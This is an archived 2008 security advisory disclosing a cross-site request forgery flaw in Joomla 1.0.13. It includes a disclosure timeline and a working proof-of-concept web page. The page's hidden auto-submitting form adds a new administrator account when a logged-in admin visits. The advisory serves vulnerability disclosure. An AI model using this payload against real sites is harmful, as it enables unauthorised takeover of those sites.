OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Joomla 1.0.13 CSRF

From: J. Carlos Nieto (xiammenteslibres.org)
Date: Tue Jan 08 2008 - 12:07:49 CST

Author: Jose Carlos Nieto.

Date: Jan 08, 2008

Severity: Mild

There exists a Cross Site Scripting security hole in Joomla 1.0.13.

Background
==========

*Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source <http://en.wikipedia.org/wiki/Open_source_software> content management system <http://en.wikipedia.org/wiki/Content_management_system> for publishing content
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets <http://en.wikipedia.org/wiki/Intranet>.
Joomla! is licensed under the GPL <http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork <http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo <http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.

Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.

Summary
=======
Joomla! has no CSRF protection. A malicious user can trick an administrator into viewing
a specially crafted webpage containing an exploit, this exploit can execute (without permission)
any command the administrator would normally execute, such as publish a content or even add a new
administrator.

Solution
========
This problem has no solution at this time.

Disclosure timeline
===================
Oct 18 2007 - Vulnerability found.
Oct 18 2007 - Vulnerability reported to vendor.
Oct 18 2007 - Answer from vendor.
Jan 08 2008 - Advisory released.

Proof of Concept
================

If a logged in administrator visits this page a new administrator will be added to the victim's
Joomla powered website.

---- exploit code ----

<script type="text/javascript">

window.onload = function() {

    var url = "http://joomlasite.com/joomla/administrator/index2.php";

    var gid = 25;

    var user = 'custom_username';

    var pass = 'custom_password';

    var email = 'joe_coolexample.com';

    var param = {

        name: user,

        username: user,

        email: email,

        password: pass,

        password2: pass,

        gid: gid,

        block: 0,

        option: 'com_users',

        task: 'save',

        sendEmail: 1

    };

    var form = document.createElement('form');

    form.action = url;

    form.method = 'post';

    form.target = 'hidden';

    form.style.display = 'none';

    for (var i in param) {

        try {

            // ie

            var input = document.createElement('<input name="'+i+'">');

        } catch(e) {

            // other browsers

            var input = document.createElement('input');

            input.name = i;

        }

        input.setAttribute('value', param[i]);

        form.appendChild(input);

    }

    document.body.appendChild(form);

    form.submit();

}

</script>

<iframe name="hidden" style="display: none"></iframe>

<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">

---- exploit code ----